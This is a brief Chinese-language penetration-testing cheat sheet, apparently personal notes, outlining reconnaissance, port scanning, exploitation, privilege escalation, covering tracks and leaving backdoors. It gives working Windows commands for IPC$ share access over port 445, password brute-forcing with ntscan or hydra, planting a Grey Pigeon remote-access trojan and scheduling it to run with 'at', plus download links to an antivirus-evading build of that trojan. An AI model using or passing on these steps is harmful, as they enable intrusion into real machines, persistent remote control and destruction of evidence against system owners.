目錄
簡單滲透測試思路
0.授權
1.信息收集
- nslookup 域名 查IP
- nslookup whois 查子域名
2.掃描漏洞
-
nmap(掃描軟件) scanport(端口掃描)
且利用 telnet 命令也可以探測:telnet IP 端口號,若標題變成 telnet 則說明開放
-
首先基礎掃描 IP 范圍 端口
-
然后再根據端口深入掃描 (IIS,apache,什么網站)
-
高級掃描:
掃描容器漏洞:如 IIS 漏洞 2003-IIS6.0 或 2008-IIS7.0 版本的
掃描網站漏洞(SQL 等)
3.漏洞利用
4.提權(shell環境、桌面環境 == 最高權限)
5.毀屍滅跡
6.留后門
7.滲透測試報告
簡單滲透測試過程
1.445漏洞之 IPC$
net use f: \\10.1.1.2\share 密碼 /user:用戶 == 把分享文件映射到自己電腦
net use f: /del
net use * /del
net use \\10.1.1.2\IPC$ 密碼 /user:用戶 == IPC漏洞
2.暴力破解系統密碼之445
- 軟件:ntscan1.0 //也可用 hydra
- 用字典編寫軟件編寫個字典
3.創建后門
- 用灰鴿子制作木馬
- copy 植入木馬
- net time \\10.1.1.2 查看目標當前時間
- at \\10.1.1.2 11:11 “c:\windows\system32\heihei.exe” 創建一個計划任務,在11:11時運行exe文件
相關軟件下載
真空密碼字典生成器: https://wwa.lanzous.com/ibl5ywd
鴿子牧民戰天免殺專版0912: https://wwa.lanzous.com/ibl5y7i
內網端口掃描ScanPort: https://wwa.lanzous.com/ibl5y1c